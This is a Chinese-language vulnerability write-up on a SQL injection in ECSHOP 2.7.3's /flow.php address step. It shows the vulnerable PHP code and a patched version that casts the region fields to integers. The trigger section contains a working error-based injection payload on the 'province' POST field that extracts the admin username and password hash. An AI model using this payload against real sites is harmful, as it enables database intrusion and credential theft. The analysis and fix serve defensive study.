標籤:
catalog
1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考
1. 漏洞描述
ECSHOP的配送地址頁面網頁沒有驗證地區參數的有效性,存在sql注入漏洞,攻擊者可利用Firefoxtamper data等外掛程式修改提交到配送地址頁面的post資料,造成未授權的資料庫操作甚至執行任意代碼
Relevant Link:
http://sebug.net/vuldb/ssvid-60554
2. 漏洞觸發條件
1. 先註冊賬戶,隨便選個商品進購物車,然後填地址,電話等等2. 把任意商品加入購物車在填寫配送地址那一頁,有地區選擇3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1//比如省選擇安徽3. 其中POST資料如下country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3用firefox tamper data改成localhost province=3‘) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # 4. 就會回顯錯誤頁面了
Relevant Link:
http://www.2cto.com/Article/201212/179861.html
3. 漏洞影響範圍
4. 漏洞程式碼分析
/flow.php
elseif ($_REQUEST[‘step‘] == ‘consignee‘){ ... //未對POST資料進行有效過濾 else { /* * 儲存收貨人資訊 */ $consignee = array( ‘address_id‘ => empty($_POST[‘address_id‘]) ? 0 : intval($_POST[‘address_id‘]), ‘consignee‘ => empty($_POST[‘consignee‘]) ? ‘‘ : trim($_POST[‘consignee‘]), ‘country‘ => empty($_POST[‘country‘]) ? ‘‘ : $_POST[‘country‘], ‘province‘ => empty($_POST[‘province‘]) ? ‘‘ : $_POST[‘province‘], ‘city‘ => empty($_POST[‘city‘]) ? ‘‘ : $_POST[‘city‘], ‘district‘ => empty($_POST[‘district‘]) ? ‘‘ : $_POST[‘district‘], ‘email‘ => empty($_POST[‘email‘]) ? ‘‘ : $_POST[‘email‘], ‘address‘ => empty($_POST[‘address‘]) ? ‘‘ : $_POST[‘address‘], ‘zipcode‘ => empty($_POST[‘zipcode‘]) ? ‘‘ : make_semiangle(trim($_POST[‘zipcode‘])), ‘tel‘ => empty($_POST[‘tel‘]) ? ‘‘ : make_semiangle(trim($_POST[‘tel‘])), ‘mobile‘ => empty($_POST[‘mobile‘]) ? ‘‘ : make_semiangle(trim($_POST[‘mobile‘])), ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ : $_POST[‘sign_building‘], ‘best_time‘ => empty($_POST[‘best_time‘]) ? ‘‘ : $_POST[‘best_time‘], ); ..
5. 防禦方法
/flow.php
elseif ($_REQUEST[‘step‘] == ‘consignee‘){ ... else { /* * 儲存收貨人資訊 */ $consignee = array( /* 對使用者輸入的POST資料進行有效過濾 */ ‘address_id‘ => empty($_POST[‘address_id‘]) ? 0 : intval($_POST[‘address_id‘]), ‘consignee‘ => empty($_POST[‘consignee‘]) ? ‘‘ : compile_str(trim($_POST[‘consignee‘])), ‘country‘ => empty($_POST[‘country‘]) ? ‘‘ : intval($_POST[‘country‘]), ‘province‘ => empty($_POST[‘province‘]) ? ‘‘ : intval($_POST[‘province‘]), ‘city‘ => empty($_POST[‘city‘]) ? ‘‘ : intval($_POST[‘city‘]), ‘district‘ => empty($_POST[‘district‘]) ? ‘‘ : intval($_POST[‘district‘]), /* */ ‘email‘ => empty($_POST[‘email‘]) ? ‘‘ : compile_str($_POST[‘email‘]), ‘address‘ => empty($_POST[‘address‘]) ? ‘‘ : compile_str($_POST[‘address‘]), ‘zipcode‘ => empty($_POST[‘zipcode‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘zipcode‘]))), ‘tel‘ => empty($_POST[‘tel‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘tel‘]))), ‘mobile‘ => empty($_POST[‘mobile‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘mobile‘]))), ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ :compile_str($_POST[‘sign_building‘]), ‘best_time‘ => empty($_POST[‘best_time‘]) ? ‘‘ : compile_str($_POST[‘best_time‘]), ); ..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /flow.php SQL Injection Vul
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
